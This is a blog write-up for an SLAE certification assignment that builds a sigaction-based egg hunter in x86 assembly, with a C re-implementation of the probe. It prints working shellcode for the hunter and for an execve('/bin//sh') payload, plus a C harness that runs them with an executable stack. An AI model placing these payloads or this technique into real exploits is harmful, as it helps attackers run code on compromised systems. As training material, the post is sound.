x86 SLAE — Assignment 3: Egg Hunter

Adam
Nov 16, 2019


The third assignment for the x86 SLAE examination is to create an egg hunter that successfully can identify shellcode within an application’s virtual address space.

Introduction

In order to tackle this assessment the de facto egg hunter whitepaper by Skape, "Safely Searching Process Virtual Address Space", was leveraged. That can be found here.

The paper details various egg hunter implementations and their pros and cons. Based on Skape's analysis, the sigaction egg hunter, which uses the sigaction(2) system call to test whether an address is readable before touching it, is the most well rounded and best suited for the majority of cases. As such, that's what will be leveraged here. A direct quote elaborating on this can be found below:

This implementation shows marked improvements in almost every category. It is smaller, faster, and maintains nearly the same amount of robustness as the previous [egghunter implementations]. It should certainly be considered the forerunner when selecting an egg hunter, even though it heavily relies on the implementation of sigaction in the kernel not changing. If it were to change to validate oldact prior to calling do_sigaction, the egg hunter implementation would have to change.

While the egg hunter can be customized to search for any 4-byte tag, the example used in the whitepaper will be leveraged here ("\x90\x50\x90\x50\x90\x50\x90\x50"). The egg is the tag written twice: the hunter itself contains the tag only once (as the immediate of its mov eax instruction), so requiring two consecutive matches stops the hunter from finding its own code. The hunter jumps to the first byte after the 8-byte egg, which is why the shellcode is simply prepended with the egg as shown below:

"\x90\x50\x90\x50\x90\x50\x90\x50" + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

Egg Hunter Shellcode

Now, the whitepaper does provide sample assembly of what an egg hunter might look like. It is a disassembly listing, so the jump targets jz 0x0 and jnz 0x5 are offsets into that listing (the or cx,0xfff and inc ecx instructions respectively) rather than labels, and the search starts from whatever ecx happens to contain. A few modifications make it assemble as written and scan from the bottom of the address space. The original shellcode can be found below:

xor ecx, ecx
or cx,0xfff
inc ecx
push byte +0x43
pop eax
int 0x80
cmp al,0xf2
jz 0x0
mov eax,0x50905090
mov edi,ecx
scasd
jnz 0x5
scasd
jnz 0x5
jmp edi

The shellcode above was only modified slightly. The hard coded jump offsets became labels, and a jmp short next_address after zeroing ecx skips the initial or cx,0xfff so that the scan starts at address 1 instead of 0x1000 and does not depend on the register's prior contents. With these changes the shellcode is also easier to read. The updated code can be found below:

global _start

section .text
_start:
    ; clear ecx so the scan always starts from address 1
    xor ecx, ecx
    jmp short next_address
; enumerate pages: on EFAULT move to the last byte of the current page,
; the following inc then lands on the first byte of the next one
next_page:
    or cx, 0x0fff
; enumerate addresses in page
next_address:
    inc ecx
    ; sigaction (syscall 0x43) with act = ecx: the kernel reads the 16-byte
    ; act structure at ecx before doing anything else and never modifies ecx
    push byte +0x43
    pop eax
    int 0x80
    ; -EFAULT is -14, low byte 0xf2: the address is not readable, skip the page
    cmp al, 0xf2
    jz next_page
    ; check if we found the egg: both dwords must equal the tag, so the single
    ; copy of it in the mov below never matches
    mov eax, 0x50905090
    mov edi, ecx
    scasd
    jnz next_address
    scasd
    jnz next_address
    ; edi now points just past the 8-byte egg, i.e. at the shellcode
    jmp edi
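To make the two mechanisms above concrete, here is the same hunter written in C and run against a constructed three-page arena. This is an added example for this write-up, not code from the post or from Skape's paper, and it assumes a Linux host: page_readable() is the int 0x80 probe, done through rt_sigaction with an explicit signal number 0 (the shellcode leaves ebx as whatever it holds; signal 0 is always invalid, so the call can only return -EFAULT or -EINVAL and never installs a handler), and find_egg() is the inc/or/scasd loop. The arena plants the tag once in page 0 (as the hunter's own mov does), makes page 1 unreadable, and puts the real egg plus a constructed stand-in payload in page 2; the names arena, demo_hunt and PAYLOAD are all made up for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20          /* Linux value, in case a strict -std hides it */
#endif
extern long syscall(long, ...);     /* glibc prototype, visible under any -std */

#define TAG 0x50905090u             /* "\x90\x50\x90\x50" read as a little-endian dword */

static size_t page_size(void)
{
    long n = sysconf(_SC_PAGESIZE);
    return n > 0 ? (size_t)n : 4096; /* the i386 shellcode hardcodes 0xfff, i.e. 4 KiB pages */
}

/* The probe. Signal 0 is never valid, so rt_sigaction(0, p, NULL, 8) can only
 * come back -EFAULT (p not readable) or -EINVAL (p readable, bad signal).
 * The kernel copies a whole struct sigaction (32 bytes on x86-64, 16 for the
 * i386 sigaction call the shellcode uses), so an address in the last bytes
 * before an unreadable page also reports EFAULT: that is the hunter's blind spot. */
static int page_readable(const void *p)
{
    long r = syscall(SYS_rt_sigaction, 0, p, (void *)0, (size_t)8 /* kernel sigset_t size */);
    return !(r == -1 && errno == EFAULT);
}

/* The scan loop, one address per iteration like the shellcode:
 *   EFAULT     -> or cx,0xfff ; inc ecx          (skip to the next page)
 *   readable   -> scasd ; jnz ; scasd ; jnz      (both dwords must match)
 *   both match -> jmp edi                        (edi already points past the egg)
 * Returns the first byte after the 8-byte egg, or NULL if [start, start+len) has none. */
static const unsigned char *find_egg(const unsigned char *start, size_t len)
{
    size_t pg = page_size();
    uintptr_t p = (uintptr_t)start, end = (uintptr_t)start + len;
    while (p < end) {
        if (!page_readable((const void *)p)) {
            p = (p | (pg - 1)) + 1;
            continue;
        }
        uint32_t a, b;
        memcpy(&a, (const void *)p, 4);
        memcpy(&b, (const void *)(p + 4), 4);
        if (a == TAG && b == TAG)
            return (const unsigned char *)(p + 8);
        p++;
    }
    return NULL;
}

/* Constructed arena: page 0 carries the 4-byte tag once (decoy), page 1 is
 * PROT_NONE (the unmapped case), page 2 carries the real egg followed by a
 * stand-in payload. The hunter must skip both and return the payload address.
 * Returns 1 on success, 0 otherwise. */
static int demo_hunt(void)
{
    size_t pg = page_size();
    unsigned char *arena = mmap(NULL, 3 * pg, PROT_READ | PROT_WRITE,
                                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (arena == MAP_FAILED)
        return 0;
    static const unsigned char egg[8] = "\x90\x50\x90\x50\x90\x50\x90\x50";
    static const unsigned char payload[] = "PAYLOAD";   /* constructed stand-in for shellcode */
    const unsigned char *expect = arena + 2 * pg + 300 + sizeof egg;

    memcpy(arena + 100, egg, 4);                         /* decoy: tag appears only once */
    memcpy(arena + 2 * pg + 300, egg, sizeof egg);       /* the real egg */
    memcpy(arena + 2 * pg + 300 + sizeof egg, payload, sizeof payload);
    if (mprotect(arena + pg, pg, PROT_NONE) != 0) {
        munmap(arena, 3 * pg);
        return 0;
    }

    const unsigned char *hit = find_egg(arena, 3 * pg);
    int ok = hit == expect
          && memcmp(hit, payload, sizeof payload) == 0
          && !page_readable(arena + pg)                  /* the probe sees the PROT_NONE page */
          && page_readable(arena + 2 * pg);
    munmap(arena, 3 * pg);
    return ok;
}

int main(void)
{
    printf(demo_hunt() ? "egg found past the decoy and the unreadable page\n"
                       : "hunt failed\n");
    return 0;
}
```

Because every readable byte costs one system call, a real hunter spends almost all its time inside mapped pages, not skipping unmapped ones; the C version has the same cost profile. Note also what the probe does not cover: an address whose struct sigaction would straddle into an unreadable page is reported as EFAULT and the rest of that page is skipped, so an egg sitting in the last few bytes of a mapping is not found.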

Assemble and link the egg hunter, then extract the bytes with the following commands:

nasm -f elf32 egghunter.nasm
ld -m elf_i386 egghunter.o -o egghunter
objdump -d ./egghunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

And it will output the following 34-byte shellcode:

"\x31\xc9\xeb\x05\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"

Execution

With the egg hunter ready and the payload (with the egg to hunt), the final application can be built. This looks as follows:

#include <stdio.h>
#include <string.h>

/* the 34-byte sigaction egg hunter from above */
unsigned char egghunter[] = \
"\x31\xc9\xeb\x05\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

/* egg (8 bytes) followed by the execve("/bin//sh") shellcode; nothing calls
 * this directly, the hunter has to find it in memory */
unsigned char code[] = \
"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    /* only the hunter is ever called; it jumps into code[] itself */
    int (*ret)() = (int(*)()) egghunter;
    ret();
    return 0;
}

Compile the above code with the following and execute it. The egg hunter will scan upwards from address 1, find the egg inside code[] in the .data segment and drop into a shell:

gcc -m32 -fno-stack-protector -z execstack -o harness harness.c

Both arrays live in .data, so -z execstack is what makes them executable in this harness; without it the first instruction of egghunter[] faults. The scan takes a moment, because every byte of a readable page costs one sigaction call, while unreadable pages are skipped with a single call each. If no egg exists anywhere in the address space the hunter does not stop: ecx eventually wraps around to 0, where sigaction accepts a NULL act pointer and the following scasd faults.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: PA-11200

The source code for this assignment can be found here.


Security consultant | Web, telecom, IoT security